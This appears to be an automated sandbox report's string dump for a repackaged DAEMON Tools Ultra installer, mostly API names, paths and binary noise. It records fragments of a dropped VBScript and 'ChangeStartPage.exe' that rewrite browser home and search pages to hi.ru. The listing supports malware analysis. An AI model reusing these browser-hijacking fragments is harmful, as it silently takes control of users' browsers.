bh_2s=Wog

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bKYaaQqIqII^^(/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bNvKeyList

Ansi based on Dropped File (JSSys3.dll.204366558)

Boolean. Is this an NTFS file system?

Ansi based on Dropped File (JSSys3.dll.204366558)

Boolean. Is this an NTFS file system?W?

Ansi based on Dropped File (JSSys3.dll.204366558)

boolFound = False

Ansi based on Dropped File (start72urez3kr.vbs)

boolFound = True

Ansi based on Dropped File (start72urez3kr.vbs)

boost unique_lock has no mutex

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

boost unique_lock owns already the mutex

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

boost::thread_resource_error

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

BoxTitle

Ansi based on Dropped File (JSSys3.dll.204366558)

bP#eo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bPecPbe``ojaq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bQ``bPOf``fhffqhkq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

BringWindowToTop

Ansi based on Dropped File (JSSys3.dll.204366558)

BrowseForFolder

Ansi based on Dropped File (JSSys3.dll.204366558)

BrowseInPlace

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

bruary

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

bs}!0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

bug in vuprintf: unknown base

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

BUTTON

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

ButtonFace

Unicode based on Dropped File (JSSys3.dll.204366558)

Buttons

Unicode based on Dropped File (JSSys3.dll.204366558)

ButtonText

Unicode based on Dropped File (JSSys3.dll.204366558)

Bw!^x&0_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

BypassDataThrottling

Unicode based on Runtime Data (dtinst.exe )

B|EEEEEEEEEHHHG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

C'6N!)XtJn0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

c(Y?!?wgF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

C) 2000-2011

Unicode based on Dropped File (Tages.dll.423655889)

C*LpvJ||5

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

C*yG'!|m<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

c,.X}K

Ansi based on Dropped File (imgengine.dll.62529018)

c9vInUseWW

Ansi based on Dropped File (JSSys3.dll.204366558)

C:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra

Unicode based on Runtime Data (DiscSoftBusService.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra\DiscSoftBusService.exe

Unicode based on Runtime Data (DiscSoftBusService.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

%PROGRAMFILES%\DAEMON Tools Ultra\DTUltra.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\DTUltra.exe,0

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%PROGRAMFILES%\DAEMON Tools Ultra\Uninstall.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%TEMP%\

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\HiRu

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%TEMP%\nscF0E4.tmp

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%TEMP%\nsrD151.tmp

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\nsrD151.tmp\nsDialogs.dll

Unicode based on Hybrid Analysis (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00401000.00000020.mdmp)

%TEMP%\HiRu\ChangeStartPage.exe

Ansi based on Hybrid Analysis (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00401000.00000020.mdmp)

%WINDIR%\system32\apphelp.dll

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

%WINDIR%\SYSTEM\MSVBVM60.DLL\3

Ansi based on Dropped File (JSSys3.dll.204366558)

C?+fxBzfa

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

c]>%29Nq"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Cache

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CallForAttributes

Unicode based on Runtime Data (DiscSoftBusService.exe )

CallWindowProcA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CallWindowProcW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Case "0"

Ansi based on Dropped File (start72urez3kr.vbs)

Case "1"

Ansi based on Dropped File (start72urez3kr.vbs)

Case Else

Ansi based on Dropped File (start72urez3kr.vbs)

CatalogFile = dtultrascsibus.cat

Ansi based on Dropped File (SET4F37.tmp)

Category

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CA~++Q`EdG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cBrowse

Ansi based on Dropped File (JSSys3.dll.204366558)

CD-XA001

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

CD001

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

CEIPEnable

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CEJEEJEEEHFF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

center

Unicode based on Dropped File (JSSys3.dll.204366558)

cEnumProc

Ansi based on Dropped File (JSSys3.dll.204366558)

Certificates

Unicode based on Runtime Data (dtinst.exe )

CfCE{]5Up

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cGetProcessList

Ansi based on Dropped File (JSSys3.dll.204366558)

Cgsstx{ym

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ChainCacheResyncFiletime

Unicode based on Runtime Data (dtinst.exe )

Change computer name.

Ansi based on Dropped File (JSSys3.dll.204366558)

Change fixed drive name.

Ansi based on Dropped File (JSSys3.dll.204366558)

ChangeCompName

Ansi based on Dropped File (JSSys3.dll.204366558)

ChangeDriveName

Ansi based on Dropped File (JSSys3.dll.204366558)

ChangeFirefoxHomePage

Ansi based on Dropped File (start72urez3kr.vbs)

ChangeIEHomePage

Ansi based on Dropped File (start72urez3kr.vbs)

ChangeIESearchPage

Ansi based on Dropped File (start72urez3kr.vbs)

ChangeOperaHomePage

Ansi based on Dropped File (start72urez3kr.vbs)

ChangeServiceConfigW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ChangeStartPage.exe

Unicode based on Runtime Data (HiRu.exe )

ChapInitiatorLogin

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ChapInitiatorPassword

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ChapTargetLogin

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ChapTargetPassword

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

CharNextA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CharNextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CharPrevA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CharPrevW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CheckDlgButton

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

chEd20

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

ChooseColorA

Ansi based on Dropped File (JSSys3.dll.204366558)

CHpQ5!fm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ciOyYiCg,c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Cj7O;c^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ckageGetPathW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ckText

Unicode based on Dropped File (JSSys3.dll.204366558)

Class

Ansi based on Dropped File (JSSys3.dll.204366558)

Class = SCSIAdapter

Ansi based on Dropped File (SET4F37.tmp)

class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}

Ansi based on Dropped File (SET4F37.tmp)

clo^y|1jy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Close a program.

Ansi based on Dropped File (JSSys3.dll.204366558)

Close a program.WW;

Ansi based on Dropped File (JSSys3.dll.204366558)

CloseClipboard

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CloseHandle

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CloseProgram

Ansi based on Dropped File (JSSys3.dll.204366558)

CloseServiceHandle

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

CloseThreadpoolTimer

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CloseThreadpoolWait

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CLSID\

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CLSIDFromString

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

cm}gVv%a

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CoCreateInstance

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ColorDlg

Ansi based on Dropped File (JSSys3.dll.204366558)

Com+Enabled

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

COMBOBOX

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

COMCTL32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

COMDLG32.DLL

Ansi based on Dropped File (JSSys3.dll.204366558)

comdlg32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

command

Unicode based on Runtime Data (DiscSoftBusService.exe )

CommandLineToArgvW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

CommDlgExtendedError

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Comments

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Common Desktop

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Common Documents

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Common Programs

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Common Startup

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CommonFilesDir

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CommonMusic

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CommonPictures

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CommonVideo

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Company name of PE file producer.

Ansi based on Dropped File (JSSys3.dll.204366558)

CompanyName

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CompareFileTime

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CompareStringEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ComputerName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Config

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ConfigureArchive

Unicode based on Runtime Data (dtinst.exe )

CONOUT$

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

Const ForAppending = 8

Ansi based on Dropped File (start72urez3kr.vbs)

Const ForReading = 1

Ansi based on Dropped File (start72urez3kr.vbs)

Const ForWriting = 2

Ansi based on Dropped File (start72urez3kr.vbs)

Const HKEY_CURRENT_USER = &H80000001

Ansi based on Dropped File (start72urez3kr.vbs)

Const HKEY_LOCAL_MACHINE = &H80000002

Ansi based on Dropped File (start72urez3kr.vbs)

Const nomerchrome = "4"

Ansi based on Dropped File (start72urez3kr.vbs)

Const strHomePage = "http://hi.ru/?10"

Ansi based on Dropped File (start72urez3kr.vbs)

Const strSearch = "http://hi.ru/search/?q={searchTerms}"

Ansi based on Dropped File (start72urez3kr.vbs)

Content Type

Unicode based on Runtime Data (DiscSoftBusService.exe )

Control Panel\Colors

Unicode based on Dropped File (JSSys3.dll.204366558)

Control Panel\Desktop

Unicode based on Dropped File (JSSys3.dll.204366558)

Control Panel\Desktop\ResourceLocale

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ControlService

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Cookies

Unicode based on Runtime Data (DiscSoftBusService.exe )

CopyFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CopyFileBufferedSynchronousIo

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CopyFileChunkSize

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CopyFileOverlappedCount

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

CopyFiles = Drivers_Dir

Ansi based on Dropped File (SET4F37.tmp)

CopyFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Copyright

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CorExitProcess

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

CoTaskMemFree

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Could not delete service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Could not open service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Could not open Service Manager

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Could not start service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Could not stop service

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

cP$k/%$/{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cR>_"O#ky3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Create

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

CreateBrushIndirect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateControl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

CreateDialogParamA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateDialogParamW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateDirectoryA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateDirectoryW

(Video) Free Automated Malware Analysis Service - powered by Falcon ...

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateEventExW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CreateEventW

Ansi based on Dropped File (imgengine.dll.62529018)

CreateFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateFileMappingW

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

CreateFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateFontIndirectA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateFontIndirectW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateItem

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

CreatePipe

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

CreatePopupMenu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateProcessA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateProcessW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateSemaphoreExW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CreateServiceW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

CreateSymbolicLinkW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CreateThread

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CreateThreadpoolTimer

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CreateThreadpoolWait

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

CreateTimer

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

CreateToolhelp32Snapshot

Ansi based on Dropped File (JSSys3.dll.204366558)

createType

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

CreateUriCacheSize

Unicode based on Runtime Data (DiscSoftBusService.exe )

CreateWindowExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

CreateWindowExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CryptnetCachedOcspSwitchToCrlCount

Unicode based on Runtime Data (dtinst.exe )

CryptnetMaxCachedOcspPerCrlCount

Unicode based on Runtime Data (dtinst.exe )

CryptnetPreFetchTriggerPeriodSeconds

Unicode based on Runtime Data (dtinst.exe )

CuwuCvuuuuCC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CVista

Ansi based on Dropped File (JSSys3.dll.204366558)

CWDIllegalInDLLSearch

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Cx."\X>!S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

CXxd5kZ'0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

cyD8~[5ip<{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d |Pg

Ansi based on Dropped File (imgengine.dll.62529018)

d%LrE)?Om[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d'_,,___"

Ansi based on Image Processing (screen_4.png)

d)iFLbcz-C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D*hRa$)5[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D-SmRKHAJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D065H=5ru

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D1M1"5-5

Ansi based on Dropped File (imgengine.dll.62529018)

d2jq2m4!A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d4&A`pVYl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d8eDjrQ;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D:>>::Z:RZYKTYPN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D<7FyKs^I

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

D>>>::>::ZZYRTKM\VW^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D>>>:>>Z:rrRY[T\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D>>>>>>::Z:ZZYNM\QW^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D^=v)`%F7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d^g#6sre;1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D^X5/,L5f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

D_Emo_

Ansi based on Image Processing (screen_7.png)

DA),DaX>U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DAEMON Tools

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DAEMON Tools iSCSI Initiator

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DAEMON Tools Ultra

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

daemon tools ultra

Unicode based on Runtime Data (dtinst.exe )

Daemon Tools Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DAEMON Tools Ultra Virtual SCSI Bus

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

DAEMON.Tools.Ultra

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DaemOnTOOlS

Ansi based on Image Processing (screen_4.png)

DataDigest

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DataFilePath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Date PE file was created, or "" if unknown.

Ansi based on Dropped File (JSSys3.dll.204366558)

Date PE file was last changed.

Ansi based on Dropped File (JSSys3.dll.204366558)

Date PE file was last changed.5

Ansi based on Dropped File (JSSys3.dll.204366558)

DateCreated

Ansi based on Dropped File (JSSys3.dll.204366558)

DateLastModified

Ansi based on Dropped File (JSSys3.dll.204366558)

dbddPPVPKPKKKLYZ]_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DCCCVeeeh

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DColor

Ansi based on Dropped File (JSSys3.dll.204366558)

Dctak{N~Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ddb.adapterType

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.geometry.cylinders

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.geometry.heads

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.geometry.sectors

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.uuid

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

ddb.virtualHWVersion

